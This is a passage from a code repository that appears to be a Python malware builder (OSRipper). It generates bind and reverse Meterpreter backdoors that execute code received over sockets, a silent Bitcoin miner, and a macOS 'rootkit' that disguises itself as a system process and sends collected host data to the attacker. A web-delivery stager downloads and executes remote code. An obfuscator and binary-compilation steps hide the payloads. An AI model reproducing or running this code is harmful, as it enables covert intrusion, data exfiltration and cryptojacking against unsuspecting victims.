\/==/_ ,_.'\==\ -\/=/- / 143 | |==|-, .=., |==| |==| _ .=. | |==| .=. \==\ \ \==\ `-' ,/ 144 | |==| '=' /==|- |==| , '=',| |==|_ : ;=: - |\==\ -\ |==|, - | 145 | |==|- , .'|==| ,|==|- '..' |==| , '=' |_\==\ ,\ /==/ , \ 146 | |==|_ . ,'.|==|- |==|, | \==\ - ,_ //==/\/ _ |/==/, .--, - \ 147 | /==/ /\ , )==/. /==/ - | '.='. - .' \==\ - , /\==\- \/=/ , / 148 | `--`-`--`--'`--`-``--`---' `--`--'' `--`---' `--`-' `--` 149 | 150 | """ 151 | 152 | logolist = [logo1, logo2, logo3, logo4] 153 | print(random.choice(logolist)) 154 | 155 | 156 | def move_file_to_directory(file_path, destination_directory): 157 | shutil.move(file_path, destination_directory) 158 | clear = lambda: os.system("clear") 159 | clear() 160 | logo() 161 | 162 | 163 | def listen(host, port): 164 | 165 | SERVER_HOST = host 166 | SERVER_PORT = int(port) 167 | # send 1024 (1kb) a time (as buffer size) 168 | BUFFER_SIZE = 1024 * 128 # 128KB max size of messages, feel free to increase 169 | # separator string for sending 2 messages in one go 170 | SEPARATOR = "" 171 | 172 | # create a socket object 173 | s = socket.socket() 174 | # bind the socket to all IP addresses of this host 175 | s.bind((SERVER_HOST, SERVER_PORT)) 176 | # make the PORT reusable 177 | # when you run the server multiple times in Linux, Address already in use error will raise 178 | s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 179 | s.listen(5) 180 | print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...") 181 | 182 | # accept any connections attempted 183 | client_socket, client_address = s.accept() 184 | 185 | # receiving the current working directory of the client 186 | cwd = client_socket.recv(BUFFER_SIZE).decode() 187 | print("[+] Current working directory:", cwd) 188 | 189 | while True: 190 | # get the command from prompt 191 | command = input(f"{cwd} $> ") 192 | if not command.strip(): 193 | # empty command 194 | continue 195 | # send the command to the client 196 | client_socket.send(command.encode()) 197 | if command.lower() == "exit": 198 | # if the command is exit, just break out of the loop 199 | break 200 | # retrieve command results 201 | output = client_socket.recv(BUFFER_SIZE).decode() 202 | print("output:", output) 203 | # split command output and current directory 204 | results, cwd = output.split(SEPARATOR) 205 | # print output 206 | print(results) 207 | # close connection to the client 208 | client_socket.close() 209 | # close server connection 210 | s.close() 211 | 212 | 213 | def gen_bind(): 214 | 215 | global port 216 | global bind 217 | global name 218 | name = "ocr" 219 | port = input( 220 | "Please enter the port number you wish the backdoor to listen on (recomended between 1024-65353): " 221 | ) 222 | bind = "1" 223 | with open(name, "a+") as ina: 224 | ina.write("port = " + str(port) + "\n") 225 | a = """ 226 | import zlib,base64,socket,struct,time 227 | def main(): 228 | try: 229 | b=socket.socket(2,socket.SOCK_STREAM) 230 | b.bind(('0.0.0.0',int(port))) 231 | b.listen(1) 232 | s,a=b.accept() 233 | l=struct.unpack('>I',s.recv(4))[0] 234 | d=s.recv(l) 235 | while len(d)I',""" 332 | + s 333 | + """.recv(4))[0] 334 | """ 335 | + dr 336 | + """=""" 337 | + s 338 | + """.recv(""" 339 | + l 340 | + """) 341 | while len(""" 342 | + dr 343 | + """)<""" 344 | + l 345 | + """: 346 | """ 347 | + dr 348 | + """+=""" 349 | + s 350 | + """.recv(""" 351 | + l 352 | + """-len(""" 353 | + dr 354 | + """)) 355 | exec(zlib.decompress(base64.b64decode(""" 356 | + dr 357 | + """)),{'s':""" 358 | + s 359 | + """}) 360 | """ 361 | ) 362 | ina.write(b2) 363 | 364 | opt_bind = input("Do you want to bind another program to this Backdoor?(y/n): ") 365 | if opt_bind == "y": 366 | bind_file = input( 367 | "Please enter the name (in same dir) of the .py you want to bind: " 368 | ) 369 | with open(bind_file, "r") as bindfile: 370 | bindfilecontent = bindfile.read() 371 | ina.write(bindfilecontent) 372 | bindfile.close 373 | 374 | print("(*) Generated Backdoor and saved as " + name) 375 | 376 | 377 | def gen_custom(): 378 | customshell = input("Please enter the file name containing your code: ") 379 | global name 380 | name = "ocr" 381 | 382 | with open(customshell, "r") as cuso: 383 | with open(name, "a+") as ina: 384 | for line in cuso: 385 | ina.write(line) 386 | 387 | opt_bind = input("Do you want to bind another program to this Backdoor?(y/n): ") 388 | if opt_bind == "y": 389 | bind_file = input( 390 | "Please enter the name (in same dir) of the .py you want to bind: " 391 | ) 392 | with open(bind_file, "r") as bindfile: 393 | bindfilecontent = bindfile.read() 394 | ina.write(bindfilecontent) 395 | bindfile.close 396 | 397 | print("(*) Generated Backdoor and saved as " + name) 398 | 399 | 400 | def gen_btc_miner(): 401 | global name 402 | global host 403 | name = "ocr" 404 | addy = input("Please enter the payout btc address: ") 405 | with open(name, "a+") as ina: 406 | ina.write('addy = "' + addy + '"\n') 407 | b = r""" 408 | 409 | import socket 410 | import json 411 | import hashlib 412 | import binascii 413 | from pprint import pprint 414 | import time 415 | import random 416 | def main(): 417 | address = addy 418 | nonce = hex(random.randint(0,2**32-1))[2:].zfill(8) 419 | 420 | host = 'solo.ckpool.org' 421 | port = 3333 422 | 423 | #print("address:{} nonce:{}".format(address,nonce)) 424 | #print("host:{} port:{}".format(host,port)) 425 | 426 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 427 | sock.connect((host,port)) 428 | 429 | #server connection 430 | sock.sendall(b'{"id": 1, "method": "mining.subscribe", "params": []}\n') 431 | lines = sock.recv(1024).decode().split('\n') 432 | response = json.loads(lines[0]) 433 | sub_details,extranonce1,extranonce2_size = response['result'] 434 | 435 | #authorize workers 436 | sock.sendall(b'{"params": ["'+address.encode()+b'", "password"], "id": 2, "method": "mining.authorize"}\n') 437 | 438 | #we read until 'mining.notify' is reached 439 | response = b'' 440 | while response.count(b'\n') < 4 and not(b'mining.notify' in response): 441 | response += sock.recv(1024) 442 | 443 | 444 | #get rid of empty lines 445 | responses = [json.loads(res) for res in response.decode().split('\n') if len(res.strip())>0 and 'mining.notify' in res] 446 | #pprint(responses) 447 | 448 | job_id,prevhash,coinb1,coinb2,merkle_branch,version,nbits,ntime,clean_jobs \ 449 | = responses[0]['params'] 450 | 451 | #target https://bitcoin.stackexchange.com/a/36228/44319 452 | target = (nbits[2:]+'00'*(int(nbits[:2],16) - 3)).zfill(64) 453 | #print('nbits:{} target:{}\n'.format(nbits,target)) 454 | 455 | extranonce2 = '00'*extranonce2_size 456 | 457 | coinbase = coinb1 + extranonce1 + extranonce2 + coinb2 458 | coinbase_hash_bin = hashlib.sha256(hashlib.sha256(binascii.unhexlify(coinbase)).digest()).digest() 459 | 460 | #print('coinbase:\n{}\n\ncoinbase hash:{}\n'.format(coinbase,binascii.hexlify(coinbase_hash_bin))) 461 | merkle_root = coinbase_hash_bin 462 | for h in merkle_branch: 463 | merkle_root = hashlib.sha256(hashlib.sha256(merkle_root + binascii.unhexlify(h)).digest()).digest() 464 | 465 | merkle_root = binascii.hexlify(merkle_root).decode() 466 | 467 | #little endian 468 | merkle_root = ''.join([merkle_root[i]+merkle_root[i+1] for i in range(0,len(merkle_root),2)][::-1]) 469 | 470 | #print('merkle_root:{}\n'.format(merkle_root)) 471 | 472 | blockheader = version + prevhash + merkle_root + nbits + ntime + nonce +\ 473 | '000000800000000000000000000000000000000000000000000000000000000000000000000000000000000080020000' 474 | 475 | #print('blockheader:\n{}\n'.format(blockheader)) 476 | 477 | hash = hashlib.sha256(hashlib.sha256(binascii.unhexlify(blockheader)).digest()).digest() 478 | hash = binascii.hexlify(hash).decode() 479 | #print('hash: {}'.format(hash)) 480 | 481 | if hash < target : 482 | #print('success!!') 483 | payload = '{"params": ["'+address+'", "'+job_id+'", "'+extranonce2 \ 484 | +'", "'+ntime+'", "'+nonce+'"], "id": 1, "method": "mining.submit"}\n' 485 | sock.sendall(payload) 486 | #print(sock.recv(1024)) 487 | else: 488 | main() 489 | 490 | sock.close() 491 | main() 492 | 493 | """ 494 | ina.write(b) 495 | 496 | 497 | def postgen(): 498 | opt_obf = input( 499 | "Do you want to obfuscate the generated programm (recommended) (y/n): " 500 | ) 501 | global encrypted 502 | encrypted = False 503 | b = "".join( 504 | secrets.choice(string.ascii_uppercase + string.ascii_lowercase) 505 | for i in range(13) 506 | ) 507 | if opt_obf == "y": 508 | encrypted = True 509 | import obfuscator 510 | 511 | obfuscator.MainMenu(name) 512 | compiling = input( 513 | "Do you want to compile the script into a binary (might require sudo) (y/n): " 514 | ) 515 | if compiling == "y": 516 | global icochoice 517 | icochoice = input( 518 | "Enter .ico path to set a custom icon (press enter for default): " 519 | ) 520 | if encrypted == True: 521 | if icochoice: 522 | compcomd = ( 523 | "python3 -m nuitka --standalone --include-module=sandboxed --disable-console --macos-onefile-icon=" 524 | + icochoice 525 | + " --windows-disable-console --onefile --assume-yes-for-downloads --macos-create-app-bundle " 526 | + name 527 | + "_or.py" 528 | ) 529 | os.system(compcomd) 530 | print('Saved under "dist" folder') 531 | else: 532 | compcomd = ( 533 | "python3 -m nuitka --standalone --include-module=sandboxed --disable-console --windows-disable-console --onefile --assume-yes-for-downloads --macos-create-app-bundle " 534 | + name 535 | + "_or.py" 536 | ) 537 | os.system(compcomd) 538 | print('Saved under "dist" folder') 539 | 540 | else: 541 | if icochoice: 542 | compcomd = ( 543 | "python3 -m nuitka --standalone --include-module=sandboxed --disable-console --macos-onefile-icon=" 544 | + icochoice 545 | + " --windows-disable-console --onefile --assume-yes-for-downloads --macos-create-app-bundle " 546 | + name 547 | ) 548 | os.system(compcomd) 549 | print('Saved under "dist" folder') 550 | else: 551 | compcomd = ( 552 | "python3 -m nuitka --standalone --include-module=sandboxed --disable-console --windows-disable-console --onefile --assume-yes-for-downloads --macos-create-app-bundle " 553 | + name 554 | ) 555 | os.system(compcomd) 556 | print('Saved under "dist" folder') 557 | print(logo) 558 | print('Backdoor saved under "dist" folder') 559 | 560 | def start_web_server(webroot): 561 | command = ["python3", "-m", "http.server", "--directory", webroot] 562 | 563 | # Start the web server as a background process 564 | subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 565 | 566 | 567 | def rep_syst(): 568 | hide = input( 569 | "Do you want the backdoor to hide itself and replicate a system proccess? (OSX and linux (aarch64) only and doesnt support ngrok) (y/n): " 570 | ) 571 | if hide == "y": 572 | global name2 573 | global reps 574 | reps = True 575 | if bind == "1": 576 | host2 = "localhost" 577 | else: 578 | host2 = host 579 | name2 = input("Please enter the name for the rat: ") 580 | icochoice = input( 581 | "Enter .ico path to set a custom icon (press enter for default): " 582 | ) 583 | with open(name2, "a+") as hider: 584 | hider.write(str('host = "' + host2 + '"\n')) 585 | v = """ 586 | import os 587 | import shutil 588 | import time 589 | directory_path = os.getcwd() 590 | folder_name = os.path.basename(directory_path) 591 | anan= __file__ 592 | filename = anan.split('/') 593 | a=anan.replace(str(filename[-1]), '') 594 | src1=a+'swiftbelt/Swiftbelt' 595 | src=a+'ocr/Contents/MacOS/ocr_or' 596 | dest1='/Users/Shared/swift' 597 | dest='/Users/Shared/com.apple.system.monitor' 598 | shutil.copyfile(src, dest) 599 | shutil.copy(src1, dest1) 600 | os.system('chmod u+x '+dest1) 601 | os.system(dest1+' > /users/shared/output.txt') 602 | time.sleep(10) 603 | 604 | import socket 605 | import sys 606 | 607 | 608 | ServerIp = host 609 | 610 | 611 | 612 | # Now we can create socket object 613 | s = socket.socket() 614 | 615 | # Lets choose one port and connect to that port 616 | PORT = 9898 617 | 618 | # Lets connect to that port where server may be running 619 | s.connect((ServerIp, PORT)) 620 | 621 | # We can send file sample.txt 622 | file = open("/users/shared/output.txt", "rb") 623 | SendData = file.read(1024) 624 | 625 | 626 | while SendData: 627 | # Now we can receive data from server 628 | #Now send the content of sample.txt to server 629 | s.send(SendData) 630 | SendData = file.read(1024) 631 | 632 | # Close the connection from client side 633 | s.close() 634 | #print('connection closed') 635 | os.system('chmod u+x '+dest) 636 | os.system(dest) 637 | 638 | """ 639 | hider.write(v) 640 | hider.close() 641 | import obfuscator 642 | 643 | obfuscator.MainMenu(name2) 644 | if icochoice: 645 | os.system( 646 | "sudo pyinstaller -i " 647 | + icochoice 648 | + ' --windowed --hidden-import imp --hidden-import socket --hidden-import urllib3 --hidden-import setproctitle --add-data "SwiftBelt:swiftbelt" --add-data "ocr_or.app:ocr" ' 649 | + str(name2) 650 | + "_or.py" 651 | ) 652 | 653 | else: 654 | os.system( 655 | 'sudo pyinstaller --windowed --hidden-import imp --hidden-import socket --hidden-import urllib3 --hidden-import setproctitle --add-data "SwiftBelt:swiftbelt" --add-data "ocr_or.app:ocr" ' 656 | + str(name2) 657 | + "_or.py" 658 | ) 659 | 660 | 661 | def server(): 662 | import socket 663 | 664 | # Now we can create socket object 665 | s = socket.socket() 666 | 667 | # Lets choose one port and start listening on that port 668 | PORT = 9898 669 | print("\n Server is listening on port :", PORT, "\n") 670 | 671 | # Now we need to bind to the above port at server side 672 | s.bind(("", PORT)) 673 | 674 | # Now we will put server into listenig mode 675 | s.listen(10) 676 | 677 | # Open one recv.txt file in write mode 678 | file = open("recv.txt", "wb") 679 | # print("\n Copied file name will be recv.txt at server side\n") 680 | 681 | # Now we do not know when client will concatct server so server should be listening contineously 682 | while True: 683 | # Now we can establish connection with clien 684 | conn, addr = s.accept() 685 | 686 | # Send a hello message to client 687 | # msg = "\n\n|---------------------------------|\n Hi Client[IP address: "+ addr[0] + "], \n ֲֳ**Welcome to Server** \n -Server\n|---------------------------------|\n \n\n" 688 | # conn.send(msg.encode()) 689 | 690 | # Receive any data from client side 691 | RecvData = conn.recv(1024) 692 | while RecvData: 693 | file.write(RecvData) 694 | RecvData = conn.recv(1024) 695 | 696 | # Close the file opened at server side once copy is completed 697 | file.close() 698 | print("\n File has been copied successfully \n") 699 | 700 | # Close connection with client 701 | conn.close() 702 | print("\n Server closed the connection \n") 703 | 704 | # Come out from the infinite while loop as the file has been copied from client. 705 | break 706 | 707 | 708 | def cleanup(): 709 | try: 710 | if reps == False: 711 | os.remove("ocr.py") 712 | os.remove("ocr_or.py") 713 | os.remove("ocr_or.spec") 714 | if reps == True: 715 | os.remove(name2) 716 | os.remove(name2 + ".spec") 717 | os.remove("ocr.py") 718 | os.remove("ocr_or.py") 719 | os.remove("ocr_or.spec") 720 | if platform.system() == "Windows": 721 | shutil.rmtree(os.getcwd() + "/dist/ocr_or.exe") 722 | else: 723 | shutil.rmtree(os.getcwd() + "/dist/" + name2) 724 | except FileNotFoundError: 725 | pass 726 | 727 | def webdelivery(): 728 | with open ("backdoor.py","a+") as outs: 729 | specf="destin='http://"+host+":8000/ocr_or.py'" 730 | websc= """ 731 | import requests 732 | import subprocess 733 | import time 734 | import random 735 | def download_and_run_script(url): 736 | response = requests.get(url) 737 | script_content = response.text 738 | exec(script_content) 739 | 740 | script_url = destin 741 | download_and_run_script(script_url) 742 | """ 743 | outs.write(specf) 744 | outs.write(websc) 745 | import obfuscator 746 | obfuscator.MainMenu("backdoor.py") 747 | os.system("python3 -m nuitka --standalone --include-module=sandboxed --disable-console --onefile --assume-yes-for-downloads backdoor_or.py") 748 | print( 749 | """ 750 | 751 | 1. Create Bind Backdoor (opens a port on the victim machine and waits for you to connect) 752 | 2. Create Encrypted TCP Meterpreter (can embed in other script) (recommended) 753 | 3. Crypt custom code 754 | ########################################################################################## 755 | Miners 756 | 4. Create a silent BTC miner 757 | ########################################################################################## 758 | Staged Payloads 759 | 5. Create Encrypted Meterpreter (staged) 760 | 761 | """ 762 | ) 763 | encrypted = False 764 | nscan = input("Please select a module: ") 765 | if nscan == "1": 766 | gen_bind() 767 | postgen() 768 | cleanup() 769 | os.system("clear") 770 | print("Generated in dist") 771 | a = "use python/meterpreter/bind_tcp in metasploit to connect to target" 772 | print(a) 773 | if nscan == "2": 774 | clear() 775 | logo() 776 | print( 777 | "##########################################################################################" 778 | ) 779 | print("Generating") 780 | gen_rev_ssl_tcp() 781 | clear() 782 | logo() 783 | print( 784 | "##########################################################################################" 785 | ) 786 | print("Specifying") 787 | postgen() 788 | clear() 789 | logo() 790 | print( 791 | "##########################################################################################" 792 | ) 793 | print("RootKit") 794 | rep_syst() 795 | if reps == True: 796 | print("Generated in dist") 797 | print( 798 | "OSRipper will now wait for the Victim to launch the Backdoor. As soon as they do you will see a file called recv.txt with all the data that has been pulled of the target" 799 | ) 800 | print("After that the listener will spawn instantly") 801 | server() 802 | print("wait...") 803 | a = ( 804 | "msfconsole -q -x 'use multi/handler;set payload python/meterpreter/reverse_tcp_ssl;set LHOST 0.0.0.0; set LPORT " 805 | + port 806 | + "; exploit'" 807 | ) 808 | os.system(a) 809 | else: 810 | print("wait...") 811 | a = ( 812 | "msfconsole -q -x 'use multi/handler;set payload python/meterpreter/reverse_tcp_ssl;set LHOST 0.0.0.0; set LPORT " 813 | + port 814 | + "; exploit'" 815 | ) 816 | os.system(a) 817 | if nscan == "3": 818 | gen_custom() 819 | postgen() 820 | rep_syst() 821 | if nscan == "4": 822 | gen_btc_miner() 823 | opt_obf = input( 824 | "Do you want to obfuscate the generated programm (recommended) (y/n): " 825 | ) 826 | print( 827 | "obfuscating... (might take a few minutes due to the layer based obfuscation)" 828 | ) 829 | encrypted = False 830 | if opt_obf == "y": 831 | encrypted = True 832 | import obfuscator 833 | 834 | obfuscator.MainMenu(name) 835 | compiling = input( 836 | "Do you want to compile the script into a binary (might require sudo) (y/n): " 837 | ) 838 | if compiling == "y": 839 | if encrypted == True: 840 | compcomd = ( 841 | "pyinstaller -F --windowed --hidden-import socket --hidden-import json --hidden-import pprint --hidden-import hashlib --hidden-import binascii " 842 | + name 843 | + "_or.py" 844 | ) 845 | os.system(compcomd) 846 | print('Saved under "dist" folder') 847 | else: 848 | compcomd = ( 849 | "pyinstaller -F --windowed --hidden-import socket --hidden-import json --hidden-import pprint --hidden-import hashlib --hidden-import binascii " 850 | + name 851 | ) 852 | os.system(compcomd) 853 | os.system(clear) 854 | print(logo) 855 | print('Miner saved under "dist" folder') 856 | print("You can monitor your `miners` here : https://solo.ckpool.org/") 857 | cleanup() 858 | if nscan == "5": 859 | clear() 860 | logo() 861 | print( 862 | "##########################################################################################" 863 | ) 864 | print("Generating") 865 | gen_rev_ssl_tcp() 866 | clear() 867 | logo() 868 | print( 869 | "##########################################################################################" 870 | ) 871 | 872 | 873 | b = "".join( 874 | secrets.choice(string.ascii_uppercase + string.ascii_lowercase) 875 | for i in range(13) 876 | ) 877 | 878 | encrypted = True 879 | import obfuscator 880 | 881 | obfuscator.MainMenu(name) 882 | file_path = "ocr_or.py" 883 | destination_directory = "webroot" 884 | move_file_to_directory(file_path, destination_directory) 885 | webdelivery() 886 | webroot = "webroot" 887 | start_web_server(webroot) 888 | print("web server started in the beackground on port 8000. the backdoor is saved as backdoor_or.py and if you have compiled it it will be in the nuitka folder") 889 | print("wait...") 890 | a = ( 891 | "msfconsole -q -x 'use multi/handler;set payload python/meterpreter/reverse_tcp_ssl;set LHOST 0.0.0.0; set LPORT " 892 | + port 893 | + "; exploit'" 894 | ) 895 | os.system(a) 896 | 897 | 898 | else: 899 | print("Please select a vaild option") 900 | -------------------------------------------------------------------------------- /obfuscator.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import zlib 4 | import time 5 | import base64 6 | import marshal 7 | import py_compile 8 | import random 9 | import secrets 10 | a=random.randint(50,70) 11 | randint = UltimateRandomNumberlow2 = secrets.randbelow(2) 12 | if sys.version_info[0]==2: 13 | _input = "raw_input('%s')" 14 | elif sys.version_info[0]==3: 15 | _input = "input('%s')" 16 | 17 | 18 | zlb = lambda in_ : zlib.compress(in_) 19 | b16 = lambda in_ : base64.b16encode(in_) 20 | b32 = lambda in_ : base64.b32encode(in_) 21 | b64 = lambda in_ : base64.b64encode(in_) 22 | mar = lambda in_ : marshal.dumps(compile(in_,'','exec')) 23 | 24 | class FileSize: 25 | def datas(self,z): 26 | for x in ['Byte','KB','MB','GB']: 27 | if z < 1024.0: 28 | return "%3.1f %s" % (z,x) 29 | z /= 1024.0 30 | def __init__(self,path): 31 | if os.path.isfile(path): 32 | dts = os.stat(path).st_size 33 | print('\n') 34 | print(" [-] Encoded File Size : %s\n" % self.datas(dts)) 35 | 36 | def Encode(data,output): 37 | loop = int(eval(str(a))) 38 | 39 | x1 = "b32(zlb(data.encode('utf8')))[::-1]" 40 | heading1 = "_ = lambda __ : __import__('zlib').decompress(__import__('base64').b32decode(__[::-1]));" 41 | x2 = "b64(zlb(data.encode('utf8')))[::-1]" 42 | heading2 = "_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));" 43 | 44 | 45 | for x in range(loop): 46 | try: 47 | data = "exec((_)(%s))" % repr(eval(x1)) 48 | except TypeError as s: 49 | sys.exit(" TypeError : " + str(s)) 50 | ab=(heading1 + data) 51 | for x in range(loop): 52 | try: 53 | data = "exec((_)(%s))" % repr(eval(x2)) 54 | except TypeError as s: 55 | sys.exit(" TypeError : " + str(s)) 56 | abc=(heading2 + ab) 57 | with open(output, 'w') as f: 58 | f.write(abc) 59 | f.close() 60 | 61 | def SEncode(data,output): 62 | for x in range(5): 63 | method = repr(b64(zlb(mar(data.encode('utf8'))))[::-1]) 64 | data = "exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))" % method 65 | z = [] 66 | for i in data: 67 | z.append(ord(i)) 68 | sata = "_ = %s\nexec(''.join(chr(__) for __ in _))" % z 69 | with open(output, 'w') as f: 70 | f.write("exec(str(chr(35)%s));" % '+chr(1)'*10000) 71 | f.write(sata) 72 | f.close() 73 | py_compile.compile(output,output) 74 | 75 | def MainMenu(file): 76 | 77 | try: 78 | data = open(file).read() 79 | except IOError: 80 | sys.exit("\n File Not Found!") 81 | output = file.lower().replace('.py', '') + '_or.py' 82 | Encode(data,output) 83 | FileSize(output) 84 | 85 | 86 | if __name__ == "__main__": 87 | MainMenu() -------------------------------------------------------------------------------- /obfuscator2.py: -------------------------------------------------------------------------------- 1 | import ast 2 | import random 3 | def yamam(original_code): 4 | class Obfuscator(ast.NodeTransformer): 5 | def __init__(self): 6 | self.names_map = {} 7 | 8 | def obfuscate_name(self, name): 9 | # Simple renaming scheme, can be made more complex 10 | if name not in self.names_map: 11 | obfuscated_name = f"var_{random.randint(1000, 9999)}" 12 | self.names_map[name] = obfuscated_name 13 | return self.names_map[name] 14 | 15 | def visit_FunctionDef(self, node): 16 | node.name = self.obfuscate_name(node.name) 17 | self.generic_visit(node) 18 | return node 19 | 20 | def visit_Name(self, node): 21 | if isinstance(node.ctx, ast.Store): 22 | node.id = self.obfuscate_name(node.id) 23 | return node 24 | 25 | def obfuscate_code(source_code): 26 | tree = ast.parse(source_code) 27 | obfuscator = Obfuscator() 28 | obfuscated_tree = obfuscator.visit(tree) 29 | obfuscated_code = ast.unparse(obfuscated_tree) 30 | return obfuscated_code 31 | 32 | # Example usage 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | Nuitka 2 | tinyaes 3 | pprintpp 4 | zstandard 5 | sandboxed 6 | pyinstaller 7 | ngrok-api 8 | pyngrok 9 | ordered-set -------------------------------------------------------------------------------- /ripgrok.py: -------------------------------------------------------------------------------- 1 | import ngrok 2 | 3 | #This isnt the official ngrok libary. This is merely my way to parse out the tunnel host and ip from the ngrok api 4 | #Subglitch1 5 | 6 | def find_between( s, first, last ): 7 | try: 8 | start = s.index( first ) + len( first ) 9 | end = s.index( last, start ) 10 | return s[start:end] 11 | except ValueError: 12 | return "" 13 | 14 | def find_between_r( s, first, last ): 15 | try: 16 | start = s.rindex( first ) + len( first ) 17 | end = s.rindex( last, start ) 18 | return s[start:end] 19 | except ValueError: 20 | return "" 21 | def get_tunnels(): 22 | # construct the api client 23 | with open('creds', 'r') as credfile: 24 | ngrok_auth=credfile.readline() 25 | client = ngrok.Client(ngrok_auth) 26 | 27 | # list all online tunnels 28 | for t in client.tunnels.list(): 29 | with open('tmp.txt', 'w+') as tmp: 30 | out = str(t) 31 | tmp.write(out) 32 | with open('tmp.txt', 'r') as tmp: 33 | anan = tmp.readline() 34 | return find_between(anan, "tcp://", "', 'started_at':") 35 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | import platform 2 | import sys 3 | import os 4 | print('Welcome to the osripper setup utility') 5 | 6 | 7 | print("""Python version: %s 8 | system: %s 9 | machine: %s 10 | platform: %s 11 | version: %s 12 | """ % ( 13 | sys.version.split('\n'), 14 | platform.system(), 15 | platform.machine(), 16 | platform.platform(), 17 | platform.version(), 18 | )) 19 | 20 | if platform.system() == "Darwin": 21 | print("MacOS detected... Ultimate Compatibility") 22 | ngchoice=input('Do you want to install with ngrok support? (y/n): ') 23 | if ngchoice=='y' or 'Y': 24 | print('You will need your ngrok Api key (not the tunnel key)') 25 | print('You can get this key for free from here https://dashboard.ngrok.com/api') 26 | print('\n') 27 | ngrok_auth = input('Please enter your key: ') 28 | os.system("pip3 install -r requirements.txt") 29 | with open('creds', 'w+') as creds: 30 | creds.write(str(ngrok_auth)) 31 | creds.close 32 | ngrok_activation='ngrok authtoken '+ngrok_auth 33 | os.system(ngrok_activation) 34 | if platform.system() == "Windows": 35 | print("This version does NOT support windows. Please use an older version.") 36 | sys.exit(1) 37 | elif platform.system() == "Linux": 38 | print("Linux Detected ... Great") 39 | ngchoice=input('Do you want to install with ngrok support? (y/n): ') 40 | if ngchoice=='y' or 'Y': 41 | print('You will need your ngrok Api key (not the tunnel key)') 42 | print('You can get this key for free from here https://dashboard.ngrok.com/api') 43 | print('\n') 44 | ngrok_auth = input('Please enter your key: ') 45 | os.system("sudo apt install patchelf") 46 | os.system("pip3 install -r requirements.txt") 47 | with open('creds', 'w+') as creds: 48 | creds.write(str(ngrok_auth)) 49 | creds.close 50 | ngrok_activation='ngrok authtoken '+ngrok_auth 51 | os.system(ngrok_activation) 52 | os.system("pip3 install -r requirements.txt") 53 | 54 | -------------------------------------------------------------------------------- /webroot/readme.txt: -------------------------------------------------------------------------------- 1 | dont touch this directory 2 | -SG1 --------------------------------------------------------------------------------